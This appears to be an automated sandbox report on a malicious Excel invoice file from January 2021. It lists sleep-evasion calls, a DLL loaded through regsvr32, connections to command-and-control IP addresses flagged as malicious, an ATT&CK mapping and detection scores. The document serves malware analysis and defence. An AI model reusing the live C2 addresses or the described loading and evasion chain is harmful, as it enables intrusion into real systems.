Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -253000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -263000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -516000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -375000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -356000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -353000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -260000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -157000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -341000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -1002000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -616000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -296000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -121000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -254000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -149000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -242000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -287000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -248000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -165000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -274000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -315000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -170000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -249000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -305000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -329000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -258000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -272000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -298000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -333000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -283000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE TID: 2464	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_008BCEF8 FindFirstFileExW,

4_2_008BCEF8

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_008A3930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,

4_2_008A3930

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_008A6C50 LdrLoadDll,

4_2_008A6C50

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,

4_2_10002140

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_008A7A60 RtlAddVectoredExceptionHandler,

4_2_008A7A60

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 80.86.91.27 236	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 5.100.228.233 61	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 46.105.131.65 232	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 77.220.64.37 187	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll.			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1488			Jump to behavior

Source: Yara match

File source: Inv0209966048-20210111075675.xls, type: SAMPLE

Source: regsvr32.exe, 00000003.00000002.2406916766.0000000000990000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2408754129.0000000000F90000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: regsvr32.exe, 00000003.00000002.2406916766.0000000000990000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2408754129.0000000000F90000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.2406916766.0000000000990000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2408754129.0000000000F90000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_008A2980 GetUserNameW,

4_2_008A2980

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 Blob

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting22	Path Interception	Process Injection112	Masquerading11	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution43	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Account Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting22	LSA Secrets	System Owner/User Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information1	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Regsvr321	DCSync	System Network Configuration Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	File and Directory Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery14	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Inv0209966048-20210111075675.xls	45%	Virustotal		Browse
Inv0209966048-20210111075675.xls	17%	Metadefender		Browse
Inv0209966048-20210111075675.xls	35%	ReversingLabs	Script-Macro.Trojan.Remcos

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\lwjmdgav.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\w80l82r[1].zip	100%	Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
education.scrollx.in	2%	Virustotal		Browse
cdn.digicertcdn.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://5.100.228.233:3389/	2%	Virustotal		Browse
https://5.100.228.233:3389/	0%	Avira URL Cloud	safe
https://80.86.91.27:3308/TATE	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://80.86.91.27/	0%	Avira URL Cloud	safe
https://5.100.228.233/=	0%	Avira URL Cloud	safe
https://5.100.228.233:3389/in	0%	Avira URL Cloud	safe
https://77.220.64.37/-39;	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
https://77.220.64.37/0;	0%	Avira URL Cloud	safe
https://46.105.131.65:1512/	0%	Avira URL Cloud	safe
https://46.105.131.65/	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
https://5.100.228.233:3389/o	0%	Avira URL Cloud	safe
https://5.100.228.233:3389/H	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://46.105.131.65:1512/an	0%	Avira URL Cloud	safe
https://5.100.228.233/	0%	Avira URL Cloud	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
education.scrollx.in	104.27.153.52	true	false	2%, Virustotal, Browse	unknown
cdn.digicertcdn.com	104.18.11.39	true	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmp	false		high
https://5.100.228.233:3389/	regsvr32.exe, 00000004.00000003.2205277449.00000000003DD000.00000004.00000001.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://investor.msn.com	DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmp	false		high
https://80.86.91.27:3308/TATE	regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/server1.crl0	regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2261028499.000000000369D000.00000004.00000001.sdmp	false		high
http://ocsp.entrust.net03	regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2261028499.000000000369D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://80.86.91.27/	regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://5.100.228.233/=	regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://5.100.228.233:3389/in	regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://77.220.64.37/-39;	regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	DWWIN.EXE, 00000007.00000002.2260811324.0000000003437000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmp	false		high
https://77.220.64.37/0;	regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://46.105.131.65:1512/	regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://46.105.131.65/	regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	DWWIN.EXE, 00000007.00000002.2260811324.0000000003437000.00000002.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	DWWIN.EXE, 00000007.00000002.2260811324.0000000003437000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	regsvr32.exe, 00000004.00000002.2409391868.0000000002390000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2261214468.0000000004000000.00000002.00000001.sdmp	false		high
https://5.100.228.233:3389/o	regsvr32.exe, 00000004.00000002.2406908102.000000000033F000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com/	DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmp	false		high
https://5.100.228.233:3389/In	regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	false		unknown
https://5.100.228.233:3389/H	regsvr32.exe, 00000004.00000002.2406908102.000000000033F000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.%s.comPA	regsvr32.exe, 00000004.00000002.2409391868.0000000002390000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2261214468.0000000004000000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://ocsp.entrust.net0D	regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2256367652.00000000001E0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://46.105.131.65:1512/an	regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://secure.comodo.com/CPS0	regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmp	false		high
https://5.100.228.233/	regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://servername/isapibackend.dll	regsvr32.exe, 00000003.00000002.2406957167.0000000001D90000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2407102495.00000000009A0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2257019838.00000000024C0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://crl.entrust.net/2048ca.crl0	regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2256367652.00000000001E0000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
5.100.228.233	unknown	Netherlands	8315	SENTIANL	true
80.86.91.27	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	true
46.105.131.65	unknown	France	16276	OVHFR	true
104.27.153.52	unknown	United States	13335	CLOUDFLARENETUS	false
77.220.64.37	unknown	Italy	44160	INTERNETONEInternetServicesProviderIT	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	338362
Start date:	12.01.2021
Start time:	07:38:42
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Inv0209966048-20210111075675.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.expl.evad.winXLS@9/18@1/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 11.7% (good quality ratio 11.5%) Quality average: 79.7% Quality standard deviation: 19.5%
HCA Information:	Successful, ratio: 87% Number of executed functions: 18 Number of non-executed functions: 56
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Found warning dialog Click Ok Found warning dialog Click Ok Attach to Office via COM Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 67.26.73.254, 8.253.95.249, 8.248.139.254, 8.253.95.121, 67.27.157.254, 40.88.32.150, 52.255.188.83, 104.18.11.39 Excluded domains from analysis (whitelisted): skypedataprdcoleus15.cloudapp.net, skypedataprdcoleus17.cloudapp.net, watson.microsoft.com, audownload.windowsupdate.nsatc.net, blobcollector.events.data.trafficmanager.net, cacerts.digicert.com, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:39:55	API Interceptor	1141x Sleep call for process: regsvr32.exe modified
07:40:17	API Interceptor	515x Sleep call for process: DWWIN.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
5.100.228.233	xad05r9ba.dll	Get hash	malicious	Browse
	mcluc5u.dll	Get hash	malicious	Browse
	INV2680371456-20210111889374.xlsm	Get hash	malicious	Browse
	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse
	HkNkyKl3uT.dll	Get hash	malicious	Browse
	ceepq536n.zip.dll	Get hash	malicious	Browse
	sample20210111-01.xlsm	Get hash	malicious	Browse
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse
	hiytvys.dll	Get hash	malicious	Browse
	l7rgi3xyd.dll	Get hash	malicious	Browse
	ymuyks.dll	Get hash	malicious	Browse
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse
	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
80.86.91.27	xad05r9ba.dll	Get hash	malicious	Browse
	mcluc5u.dll	Get hash	malicious	Browse
	INV2680371456-20210111889374.xlsm	Get hash	malicious	Browse
	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse
	HkNkyKl3uT.dll	Get hash	malicious	Browse
	ceepq536n.zip.dll	Get hash	malicious	Browse
	sample20210111-01.xlsm	Get hash	malicious	Browse
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse
	hiytvys.dll	Get hash	malicious	Browse
	l7rgi3xyd.dll	Get hash	malicious	Browse
	ymuyks.dll	Get hash	malicious	Browse
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse
	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
46.105.131.65	xad05r9ba.dll	Get hash	malicious	Browse
	mcluc5u.dll	Get hash	malicious	Browse
	INV2680371456-20210111889374.xlsm	Get hash	malicious	Browse
	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse
	HkNkyKl3uT.dll	Get hash	malicious	Browse
	ceepq536n.zip.dll	Get hash	malicious	Browse
	sample20210111-01.xlsm	Get hash	malicious	Browse
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse
	hiytvys.dll	Get hash	malicious	Browse
	l7rgi3xyd.dll	Get hash	malicious	Browse
	ymuyks.dll	Get hash	malicious	Browse
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse
	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
77.220.64.37	xad05r9ba.dll	Get hash	malicious	Browse
	mcluc5u.dll	Get hash	malicious	Browse
	INV2680371456-20210111889374.xlsm	Get hash	malicious	Browse
	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse
	HkNkyKl3uT.dll	Get hash	malicious	Browse
	ceepq536n.zip.dll	Get hash	malicious	Browse
	sample20210111-01.xlsm	Get hash	malicious	Browse
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse
	hiytvys.dll	Get hash	malicious	Browse
	l7rgi3xyd.dll	Get hash	malicious	Browse
	ymuyks.dll	Get hash	malicious	Browse
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse
	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Dridex.735.5073.dll	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xls	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.digicertcdn.com	INV2680371456-20210111889374.xlsm	Get hash	malicious	Browse	104.18.10.39
	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse	104.18.11.39
	sample20210111-01.xlsm	Get hash	malicious	Browse	104.18.10.39
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	104.18.11.39
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse	104.18.10.39
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	104.18.10.39
	SurfsharkSetup.exe	Get hash	malicious	Browse	104.18.10.39
	https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1	Get hash	malicious	Browse	104.18.10.39
	ASHLEY NAIDOO CV.doc	Get hash	malicious	Browse	104.18.10.39
	RFQ.doc	Get hash	malicious	Browse	104.18.10.39
	SecuriteInfo.com.Trojan.BtcMine.3311.17146.exe	Get hash	malicious	Browse	104.18.11.39
	http://test.kunmiskincare.com/index.php	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=Q3qQnfemZbaKqqMTD32WX0Q-2F38lqT2tAzE5eVnmPd7-2BQtbqdrAGPxGIiQmtbZbEcQfp88ilOu42BqywW-2BHQ-2F36ib8mcb8EYG4w64Icmefi3xXbpzwMP3NQ3974KeR1Cm-2FtwcR7xFilzHs6N8iNLyS48aGcVYmSpzSB5rZFj7iHuxTwLnTumc1AOR4vtcYHqqiqHY7g-2B-2FJ-2Bp2X-2FMfZ-2FQF6-2BtQvwrHR4Do9NZhu9Dvij-2BKa330W7UbuEz2iIv6oZ18C14g_HT-2FwmlBF7R5nW6HayR9wjpSE-2FEYoNhBRZJxfk0aqS7vYxNZiuzaetMNdYjE6WQ7lhnX-2F3CEUYMAVCWb9b2KoxJgG7bbDpZV8jJzJcz-2FHdj603HdwbUFnR5bNfB4iXdW0ho4xmgP3jr4yW0dQVZ-2FVH-2B4BUSDEwiU9rMA5oZN54vSw8okk6D-2FopaYrwFKHesb3rZ-2B-2FXvvZXiTmiwexXLF98nxPgg28hqPBVP8Ce82XUi0-3D	Get hash	malicious	Browse	104.18.10.39
